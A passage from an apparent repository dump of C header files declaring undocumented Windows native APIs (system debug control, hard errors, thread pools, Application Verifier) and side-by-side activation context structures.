SysDbgWriteMsr,\n    SysDbgReadBusData,\n    SysDbgWriteBusData,\n    SysDbgCheckLowMemory,\n    SysDbgEnableKernelDebugger,\n    
SysDbgDisableKernelDebugger,\n    SysDbgGetAutoKdEnable,\n    SysDbgSetAutoKdEnable,\n    SysDbgGetPrintBufferSize,\n    SysDbgSetPrintBufferSize,\n    SysDbgGetKdUmExceptionEnable,\n    SysDbgSetKdUmExceptionEnable,\n    SysDbgGetTriageDump,\n    SysDbgGetKdBlockEnable,\n    SysDbgSetKdBlockEnable,\n    SysDbgRegisterForUmBreakInfo,\n    SysDbgGetUmBreakPid,\n    SysDbgClearUmBreakPid,\n    SysDbgGetUmAttachPid,\n    SysDbgClearUmAttachPid,\n    SysDbgGetLiveKernelDump,\n    SysDbgKdPullRemoteFile,\n    SysDbgMaxInfoClass\n} SYSDBG_COMMAND, *PSYSDBG_COMMAND;\n\ntypedef struct _SYSDBG_VIRTUAL {\n    PVOID Address;\n    PVOID Buffer;\n    ULONG Request;\n} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSystemDebugControl(\n    _In_ SYSDBG_COMMAND Command,\n    _Inout_updates_bytes_opt_(InputBufferLength) PVOID InputBuffer,\n    _In_ ULONG InputBufferLength,\n    _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,\n    _In_ ULONG OutputBufferLength,\n    _Out_opt_ PULONG ReturnLength);\n\n/************************************************************************************\n*\n* HardError API.\n*\n************************************************************************************/\n\n#ifndef HARDERROR_OVERRIDE_ERRORMODE\n#define HARDERROR_OVERRIDE_ERRORMODE 0x10000000\n#endif\n\ntypedef enum _HARDERROR_RESPONSE_OPTION {\n    OptionAbortRetryIgnore,\n    OptionOk,\n    OptionOkCancel,\n    OptionRetryCancel,\n    OptionYesNo,\n    OptionYesNoCancel,\n    OptionShutdownSystem,\n    OptionOkNoWait,\n    OptionCancelTryContinue\n} HARDERROR_RESPONSE_OPTION;\n\ntypedef enum _HARDERROR_RESPONSE {\n    ResponseReturnToCaller,\n    ResponseNotHandled,\n    ResponseAbort,\n    ResponseCancel,\n    ResponseIgnore,\n    ResponseNo,\n    ResponseOk,\n    ResponseRetry,\n    ResponseYes,\n    ResponseTryAgain,\n    ResponseContinue\n} HARDERROR_RESPONSE;\n\nNTSYSCALLAPI\nNTSTATUS\nNTAPI\nNtRaiseHardError(\n    _In_ NTSTATUS ErrorStatus,\n    _In_ 
ULONG NumberOfParameters,\n    _In_ ULONG UnicodeStringParameterMask,\n    _In_reads_(NumberOfParameters) PULONG_PTR Parameters,\n    _In_ ULONG ValidResponseOptions,\n    _Out_ PULONG Response);\n\n/************************************************************************************\n*\n* IoRing API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateIoRing(\n    _Out_ PHANDLE IoRingHandle,\n    _In_ ULONG CreateParametersLength,\n    _In_ PVOID CreateParameters,\n    _In_ ULONG OutputParametersLength,\n    _Out_ PVOID OutputParameters);\n\n/************************************************************************************\n*\n* Thread Pooling API and definitions.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nTpAllocPool(\n    _Out_ PTP_POOL* PoolReturn,\n    _Reserved_ PVOID Reserved);\n\nNTSYSAPI\nVOID\nNTAPI\nTpReleasePool(\n    _Inout_ PTP_POOL Pool);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nTpAllocWork(\n    _Out_ PTP_WORK* WorkReturn,\n    _In_ PTP_WORK_CALLBACK Callback,\n    _Inout_opt_ PVOID Context,\n    _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron);\n\nNTSYSAPI\nVOID\nNTAPI\nTpReleaseWork(\n    _Inout_ PTP_WORK Work);\n\nNTSYSAPI\nVOID\nNTAPI\nTpPostWork(\n    _Inout_ PTP_WORK Work);\n\nNTSYSAPI\nVOID\nNTAPI\nTpWaitForWork(\n    _Inout_ PTP_WORK Work,\n    _In_ LOGICAL CancelPendingCallbacks);\n\n/************************************************************************************\n*\n* ApiSet definitions.\n*\n************************************************************************************/\n\nNTSYSAPI\nBOOL\nNTAPI\nApiSetQueryApiSetPresence(\n    _In_ PCUNICODE_STRING Namespace,\n    _Out_ PBOOLEAN Present);\n\nNTSYSAPI\nBOOL\nNTAPI\nApiSetQueryApiSetPresenceEx(\n    _In_ PCUNICODE_STRING Namespace,\n    _Out_ PBOOLEAN IsInSchema,\n    _Out_ PBOOLEAN 
Present);\n\n/************************************************************************************\n*\n* Application Verifier API and definitions.\n*\n************************************************************************************/\n\n#ifndef DLL_PROCESS_VERIFIER\n#define DLL_PROCESS_VERIFIER 4\n#endif\n\ntypedef VOID(NTAPI *RTL_VERIFIER_DLL_LOAD_CALLBACK)(\n    PWSTR DllName,\n    PVOID DllBase,\n    SIZE_T DllSize,\n    PVOID Reserved);\n\ntypedef VOID(NTAPI *RTL_VERIFIER_DLL_UNLOAD_CALLBACK)(\n    PWSTR DllName,\n    PVOID DllBase,\n    SIZE_T DllSize,\n    PVOID Reserved);\n\ntypedef VOID(NTAPI *RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK)(\n    PVOID AllocationBase,\n    SIZE_T AllocationSize);\n\ntypedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {\n    PCHAR ThunkName;\n    PVOID ThunkOldAddress;\n    PVOID ThunkNewAddress;\n} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;\n\ntypedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {\n    PWCHAR DllName;\n    DWORD DllFlags;\n    PVOID DllAddress;\n    PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;\n} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;\n\ntypedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {\n    DWORD Length;\n    PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;\n    RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;\n    RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;\n    PWSTR VerifierImage;\n    DWORD VerifierFlags;\n    DWORD VerifierDebug;\n    PVOID RtlpGetStackTraceAddress;\n    PVOID RtlpDebugPageHeapCreate;\n    PVOID RtlpDebugPageHeapDestroy;\n    RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;\n} RTL_VERIFIER_PROVIDER_DESCRIPTOR, *PRTL_VERIFIER_PROVIDER_DESCRIPTOR;\n\n//\n// Application verifier standard flags.\n//\n#define RTL_VRF_FLG_FULL_PAGE_HEAP                   0x00000001\n#define RTL_VRF_FLG_RESERVED_DONOTUSE                0x00000002\n#define RTL_VRF_FLG_HANDLE_CHECKS                    0x00000004\n#define RTL_VRF_FLG_STACK_CHECKS               
      0x00000008\n#define RTL_VRF_FLG_APPCOMPAT_CHECKS                 0x00000010\n#define RTL_VRF_FLG_TLS_CHECKS                       0x00000020\n#define RTL_VRF_FLG_DIRTY_STACKS                     0x00000040\n#define RTL_VRF_FLG_RPC_CHECKS                       0x00000080\n#define RTL_VRF_FLG_COM_CHECKS                       0x00000100\n#define RTL_VRF_FLG_DANGEROUS_APIS                   0x00000200\n#define RTL_VRF_FLG_RACE_CHECKS                      0x00000400\n#define RTL_VRF_FLG_DEADLOCK_CHECKS                  0x00000800\n#define RTL_VRF_FLG_FIRST_CHANCE_EXCEPTION_CHECKS    0x00001000\n#define RTL_VRF_FLG_VIRTUAL_MEM_CHECKS               0x00002000\n#define RTL_VRF_FLG_ENABLE_LOGGING                   0x00004000\n#define RTL_VRF_FLG_FAST_FILL_HEAP                   0x00008000\n#define RTL_VRF_FLG_VIRTUAL_SPACE_TRACKING           0x00010000\n#define RTL_VRF_FLG_ENABLED_SYSTEM_WIDE              0x00020000\n#define RTL_VRF_FLG_MISCELLANEOUS_CHECKS             0x00020000\n#define RTL_VRF_FLG_LOCK_CHECKS                      0x00040000\n\nNTSYSAPI\nVOID\nNTAPI\nRtlApplicationVerifierStop(\n    _In_ ULONG_PTR Code,\n    _In_ PSTR Message,\n    _In_ ULONG_PTR Param1,\n    _In_ PSTR Description1,\n    _In_ ULONG_PTR Param2,\n    _In_ PSTR Description2,\n    _In_ ULONG_PTR Param3,\n    _In_ PSTR Description3,\n    _In_ ULONG_PTR Param4,\n    _In_ PSTR Description4);\n\n#ifndef VERIFIER_STOP\n#define VERIFIER_STOP(Code, Msg, P1, S1, P2, S2, P3, S3, P4, S4) {  \\\n        RtlApplicationVerifierStop ((Code),                         \\\n                                    (Msg),                          \\\n                                    (ULONG_PTR)(P1),(S1),           \\\n                                    (ULONG_PTR)(P2),(S2),           \\\n                                    (ULONG_PTR)(P3),(S3),           \\\n                                    (ULONG_PTR)(P4),(S4));          \\\n  
}\n#endif\n\n/************************************************************************************\n*\n* CPU partition API & definitions.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenCpuPartition(\n    _Out_ PHANDLE CpuPartitionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateCpuPartition(\n    _Out_ PHANDLE CpuPartitionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationCpuPartition(\n    _In_ HANDLE CpuPartitionHandle,\n    _In_ ULONG CpuPartitionInformationClass,\n    _In_reads_bytes_(CpuPartitionInformationLength) PVOID CpuPartitionInformation,\n    _In_ ULONG CpuPartitionInformationLength,\n    _Reserved_ PVOID Reserved0,\n    _Reserved_ ULONG Reserved1,\n    _Reserved_ ULONG Reserved2);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationCpuPartition(\n    _In_ HANDLE CpuPartitionHandle,\n    _In_ ULONG CpuPartitionInformationClass,\n    _Out_writes_bytes_opt_(CpuPartitionInformationLength) PVOID CpuPartitionInformation,\n    _In_ ULONG CpuPartitionInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\n//\n// NTOS_RTL HEADER END\n//\n\n#ifdef __cplusplus\n}\n#endif\n\n#pragma warning(pop)\n\n#endif // NTOS_RTL\n"
  },
  {
    "path": "Source/Shared/ntos/ntsxs.h",
    "content": "/************************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2023, translated from Microsoft sources/debugger\n*\n*  TITLE:       NTSXS.H\n*\n*  VERSION:     1.05\n*\n*  DATE:        24 Jun 2023\n*\n*  Common header file for the SxS related API functions and definitions.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n************************************************************************************/\n\n#ifndef NTSXS_RTL\n#define NTSXS_RTL\n\n//\n// NTSXS_RTL HEADER BEGIN\n//\n\n#if defined(__cplusplus)\nextern \"C\" {\n#endif\n\n#pragma warning(push)\n#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int\n\n#define ACTCTX_PROCESS_DEFAULT ((void*)NULL)\n#define ACTCTX_EMPTY ((void*)(LONG_PTR)-3)\n#define ACTCTX_SYSTEM_DEFAULT  ((void*)(LONG_PTR)-4)\n#define IS_SPECIAL_ACTCTX(x) (((((LONG_PTR)(x)) - 1) | 7) == -1)\n\ntypedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;\ntypedef const struct _ACTIVATION_CONTEXT *PCACTIVATION_CONTEXT;\n\n#define INVALID_ACTIVATION_CONTEXT ((PACTIVATION_CONTEXT) ((LONG_PTR) -1))\n\n#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_USE_ACTIVE_ACTIVATION_CONTEXT (0x00000001)\n#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_ACTIVATION_CONTEXT_IS_MODULE  (0x00000002)\n#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_ACTIVATION_CONTEXT_IS_ADDRESS (0x00000004)\n#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_NO_ADDREF  (0x80000000)\n\n#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_ACTIVATION_CONTEXT (0x00000001)\n#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_FLAGS              (0x00000002)\n#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_ASSEMBLY_METADATA  (0x00000004)\n\n#define 
ACTIVATION_CONTEXT_SECTION_FORMAT_UNKNOWN  0\n#define ACTIVATION_CONTEXT_SECTION_FORMAT_STRING   1\n#define ACTIVATION_CONTEXT_SECTION_FORMAT_GUID     2\n\n#define ACTIVATION_CONTEXT_DATA_MAGIC               0x78746341 //'xtcA'\n#define ACTIVATION_CONTEXT_STRING_SECTION_MAGIC     0x64487353 //'dHsS'\n#define ACTIVATION_CONTEXT_GUID_SECTION_MAGIC       0x64487347 //'dHsG'\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_TOC_HEADER {\n    ULONG HeaderSize;\n    ULONG EntryCount;\n    ULONG FirstEntryOffset;\n    ULONG Flags;\n} ACTIVATION_CONTEXT_DATA_TOC_HEADER, *PACTIVATION_CONTEXT_DATA_TOC_HEADER;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER {\n    ULONG HeaderSize;\n    ULONG EntryCount;\n    ULONG FirstEntryOffset;\n    ULONG Flags;\n} ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER, *PACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_TOC_ENTRY {\n    ULONG Id;  //type of section\n    ULONG Offset;\n    ULONG Length;\n    ULONG Format; //ACTIVATION_CONTEXT_SECTION_FORMAT_*\n} ACTIVATION_CONTEXT_DATA_TOC_ENTRY, *PACTIVATION_CONTEXT_DATA_TOC_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY {\n    GUID ExtensionGuid;\n    ULONG Offset;\n    ULONG Length;\n} ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY, *PACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HEADER {\n    ULONG Magic;\n    ULONG HeaderSize;\n    ULONG FormatVersion;\n    ULONG DataFormatVersion;\n    ULONG Flags;\n    ULONG ElementCount;\n    ULONG ElementListOffset;\n    ULONG HashAlgorithm;\n    ULONG SearchStructureOffset;\n    ULONG UserDataOffset;\n    ULONG UserDataSize;\n} ACTIVATION_CONTEXT_STRING_SECTION_HEADER, *PACTIVATION_CONTEXT_STRING_SECTION_HEADER;\n\n#define ACTIVATION_CONTEXT_STRING_SECTION_CASE_INSENSITIVE              (0x00000001)\n#define ACTIVATION_CONTEXT_STRING_SECTION_ENTRIES_IN_PSEUDOKEY_ORDER    (0x00000002)\n\ntypedef struct 
_ACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE {\n    ULONG BucketTableEntryCount;\n    ULONG BucketTableOffset;\n} ACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE, *PACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE;\n\ntypedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET {\n    ULONG ChainCount;\n    ULONG ChainOffset;\n} ACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET, *PACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET;\n\ntypedef struct _ACTIVATION_CONTEXT_STRING_SECTION_ENTRY {\n    ULONG PseudoKey;\n    ULONG KeyOffset;\n    ULONG KeyLength;\n    ULONG Offset;\n    ULONG Length;\n    ULONG AssemblyRosterIndex;\n} ACTIVATION_CONTEXT_STRING_SECTION_ENTRY, *PACTIVATION_CONTEXT_STRING_SECTION_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HEADER {\n    ULONG Magic;\n    ULONG HeaderSize;\n    ULONG FormatVersion;\n    ULONG DataFormatVersion;\n    ULONG Flags;\n    ULONG ElementCount;\n    ULONG ElementListOffset;\n    ULONG HashAlgorithm;\n    ULONG SearchStructureOffset;\n    ULONG UserDataOffset;\n    ULONG UserDataSize;\n} ACTIVATION_CONTEXT_GUID_SECTION_HEADER, *PACTIVATION_CONTEXT_GUID_SECTION_HEADER;\n\ntypedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE {\n    ULONG BucketTableEntryCount;\n    ULONG BucketTableOffset;\n} ACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE, *PACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE;\n\ntypedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET {\n    ULONG ChainCount;\n    ULONG ChainOffset;\n} ACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET, *PACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET;\n\ntypedef struct _ACTIVATION_CONTEXT_GUID_SECTION_ENTRY {\n    GUID Guid;\n    ULONG Offset;\n    ULONG Length;\n    ULONG AssemblyRosterIndex;\n} ACTIVATION_CONTEXT_GUID_SECTION_ENTRY, *PACTIVATION_CONTEXT_GUID_SECTION_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION {\n    ULONG Size;\n    ULONG Flags;\n    GUID PolicyCoherencyGuid;\n    GUID PolicyOverrideGuid;\n    ULONG ApplicationDirectoryPathType;\n 
   ULONG ApplicationDirectoryLength;\n    ULONG ApplicationDirectoryOffset;\n    ULONG ResourceName;\n} ACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION;\n\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ROOT_ASSEMBLY              (0x00000001)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_POLICY_APPLIED             (0x00000002)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ASSEMBLY_POLICY_APPLIED    (0x00000004)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ROOT_POLICY_APPLIED        (0x00000008)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_PRIVATE_ASSEMBLY           (0x00000010)\n\n#pragma pack(push,1)\ntypedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION {\n    ULONG Size;\n    ULONG Flags;\n    ULONG EncodedAssemblyIdentityLength;\n    ULONG EncodedAssemblyIdentityOffset;\n    ULONG ManifestPathType;\n    ULONG ManifestPathLength;\n    ULONG ManifestPathOffset;\n    LARGE_INTEGER ManifestLastWriteTime;\n    ULONG PolicyPathType;\n    ULONG PolicyPathLength;\n    ULONG PolicyPathOffset;\n    LARGE_INTEGER PolicyLastWriteTime;\n    ULONG MetadataSatelliteRosterIndex;\n    ULONG Unused2;\n    ULONG ManifestVersionMajor;\n    ULONG ManifestVersionMinor;\n    ULONG PolicyVersionMajor;\n    ULONG PolicyVersionMinor;\n    ULONG AssemblyDirectoryNameLength;\n    ULONG AssemblyDirectoryNameOffset;\n    ULONG NumOfFilesInAssembly;\n    ULONG LanguageLength;\n    ULONG LanguageOffset;\n    ACTCTX_REQUESTED_RUN_LEVEL RunLevel;\n    ULONG UiAccess;\n} ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION;\n#pragma pack(pop)\n\n#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_INCLUDES_BASE_NAME                     (0x00000001)\n#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_OMITS_ASSEMBLY_ROOT                    (0x00000002)\n#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_EXPAND                                 
(0x00000004)\n#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SYSTEM_DEFAULT_REDIRECTED_SYSTEM32_DLL (0x00000008)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION {\n    ULONG Size;\n    ULONG Flags;\n    ULONG TotalPathLength;\n    ULONG PathSegmentCount;\n    ULONG PathSegmentOffset;\n} ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION, *PACTIVATION_CONTEXT_DATA_DLL_REDIRECTION;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT {\n    ULONG Length;\n    ULONG Offset;\n} ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT, *PACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION {\n    ULONG Size;\n    ULONG Flags;\n    ULONG VersionSpecificClassNameLength;\n    ULONG VersionSpecificClassNameOffset;\n    ULONG DllNameLength;\n    ULONG DllNameOffset;\n} ACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION, *PACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION;\n\n#define ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS_FORMAT_LONGHORN (1)\n\n#define SXS_WINDOWS_SETTINGS_NAMESPACE          L\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_NAMESPACE_CCH      (53)\n\n#define SXS_WINDOWS_SETTINGS_2011_NAMESPACE     L\"http://schemas.microsoft.com/SMI/2011/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2011_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2013_NAMESPACE     L\"http://schemas.microsoft.com/SMI/2013/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2013_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2014_NAMESPACE     L\"http://schemas.microsoft.com/SMI/2014/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2014_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2016_NAMESPACE     L\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2016_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2017_NAMESPACE     L\"http://schemas.microsoft.com/SMI/2017/WindowsSettings\"\n#define 
SXS_WINDOWS_SETTINGS_2017_NAMESPACE_CCH (53)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS {\n    ULONG Size;\n    ULONG Flags;\n    ULONG SettingNamespaceLength;\n    ULONG SettingNamespaceOffset;\n    ULONG SettingNameLength;\n    ULONG SettingNameOffset;\n    ULONG SettingValueLength;\n    ULONG SettingValueOffset;\n} ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS, *PACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS;\n\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_FORMAT_WHISTLER (1)\n\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_INVALID (0)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_APARTMENT (1)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_FREE (2)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_SINGLE (3)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_BOTH (4)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_NEUTRAL (5)\n\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET       (8)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_DEFAULT       (0x01 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_ICON          (0x02 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_CONTENT       (0x04 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_THUMBNAIL     (0x08 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_DOCPRINT      (0x10 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION {\n    ULONG Size;\n    ULONG Flags;\n    ULONG ThreadingModel;\n    GUID ReferenceClsid;\n    GUID ConfiguredClsid;\n    GUID 
ImplementedClsid;\n    GUID TypeLibraryId;\n    ULONG ModuleLength;\n    ULONG ModuleOffset;\n    ULONG ProgIdLength;\n    ULONG ProgIdOffset;\n    ULONG ShimDataLength;\n    ULONG ShimDataOffset;\n    ULONG MiscStatusDefault;\n    ULONG MiscStatusContent;\n    ULONG MiscStatusThumbnail;\n    ULONG MiscStatusIcon;\n    ULONG MiscStatusDocPrint;\n} ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION;\n\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM_TYPE_OTHER (1)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM_TYPE_CLR_CLASS (2)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM {\n    ULONG Size;\n    ULONG Flags;\n    ULONG Type;\n    ULONG ModuleLength;\n    ULONG ModuleOffset;\n    ULONG TypeLength;\n    ULONG TypeOffset;\n    ULONG ShimVersionLength;\n    ULONG ShimVersionOffset;\n    ULONG DataLength;\n    ULONG DataOffset;\n} ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM, *PACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION {\n    ULONG Size;\n    ULONG Flags;\n    ULONG NameLength;\n    ULONG NameOffset;\n    USHORT ResourceId;\n    USHORT LibraryFlags;\n    ULONG HelpDirLength;\n    ULONG HelpDirOffset;\n} ACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION {\n    ULONG Size;\n    ULONG Flags;\n    ULONG ConfiguredClsidOffset;\n} ACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION;\n\ntypedef struct _SXS_OVERRIDE_MANIFEST {\n    PCWSTR  Name;\n    PVOID   Address;\n    SIZE_T  Size;\n} SXS_OVERRIDE_MANIFEST, *PSXS_OVERRIDE_MANIFEST;\n\ntypedef struct _SXS_MANIFEST_STREAM {\n    const IID* IIDStream;\n    PVOID      OutIStream;\n}SXS_MANIFEST_STREAM, *PSXS_MANIFEST_STREAM;\n\ntypedef struct _ACTIVATION_CONTEXT_ASSEMBLY_DATA 
{\n    ULONG Size;\n    ULONG Flags;\n    WCHAR *AssemblyName;\n    ULONG AssemblyNameLength;\n    ULONG HashAlgorithm;\n    ULONG PseudoKey;\n} ACTIVATION_CONTEXT_ASSEMBLY_DATA, *PACTIVATION_CONTEXT_ASSEMBLY_DATA;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER {\n    ULONG HeaderSize;\n    ULONG HashAlgorithm;\n    ULONG EntryCount;\n    ULONG FirstEntryOffset;\n    ULONG AssemblyInformationSectionOffset;\n} ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER;\n\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY_INVALID (0x00000001)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY_ROOT    (0x00000002)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY {\n    ULONG Flags;\n    ULONG PseudoKey;\n    ULONG AssemblyNameOffset;\n    ULONG AssemblyNameLength;\n    ULONG AssemblyInformationOffset;\n    ULONG AssemblyInformationLength;\n} ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY, 